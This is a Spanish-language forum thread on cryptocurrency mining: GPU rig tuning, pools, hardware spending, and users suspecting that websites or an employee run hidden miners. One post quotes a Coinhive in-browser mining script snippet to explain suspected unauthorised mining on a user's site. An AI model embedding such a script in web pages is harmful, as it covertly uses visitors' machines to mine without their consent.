#116 Estoy en las mismas jajaja
Existe algún método de generar bitcoins a través de un buscador con acceso de muchos clientes?
Editado.
#124 Vamos, que alguno de mis empleados está ganando dinero a través de las búsquedas verdad?
#127 Hombre, si no lo has autorizado tu, están usando tu página para generar dinero en alguna criptomoneda xD
#127 Load the Coinhive Miner and start mining
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.User('<site-key>', 'john-doe');
miner.start();
</script>
Va a ser que sí
Yo estoy con el pc sacando ftc para probar y con el rig estoy minando musicoin que salen como churros.
Estoy teniendo problemas con el rig, no consigo mas de 22mhs con la rx570, he flasheado la Bios creo de de forma correcta y en el afterburner tengo oc a 1150/2000 pero de 22mhh no sube...
Alguien con un rx que haya conseguido valores cercanos a los 29mhs puede decirme como y con que bios lo ha hecho?
Muchas gracias!
#131 miningpoolhub.com ahi esta todo, a parte que tiene varios pools.
Yo me lo envió directo al exchange, el rig esta en proceso, ahora mismo tiene 2 rx580 y están en camino 5 mas que deberían de llegar hoy o el jueves.
Yo tengo hasta 10.000€ de inversion para montarme un sexo para minar criptomonedas, que me recomendais? algun equipo prehecho? cual? gracias queridos
#137 te renta teniendo en cuenta el coste de luz y la inversion inicial? ten en cuenta q se desfasan los equipos
existe algun programa fiable que localize si me estan usando para minar? desde que uso plusdede(creo) a veces se arranca la grafica(ya hasta sin usar la pagina plusdede) sin venir a cuento,tengo instalado el malwarebytes y el cclenaer pero no me detectan nada,pero cada 2 o 3min arranca la grafica y se pone a tope durante pocos segundos :S
A mi me saltaba el malwarebytes bloqueando el coinhive constantemente al entrar en un puto perfil de twitter. Está toda la red infestada de esta mierda o que?
#143 danke y fallo mio por no leer estas ultimas entradas,estoy usando el que has puesto para firefox,pero me sigue arrancando la grafica,investigare a ver que pasa porque no es normal,ya lo dejare por aqui si es por algun malware para tal fin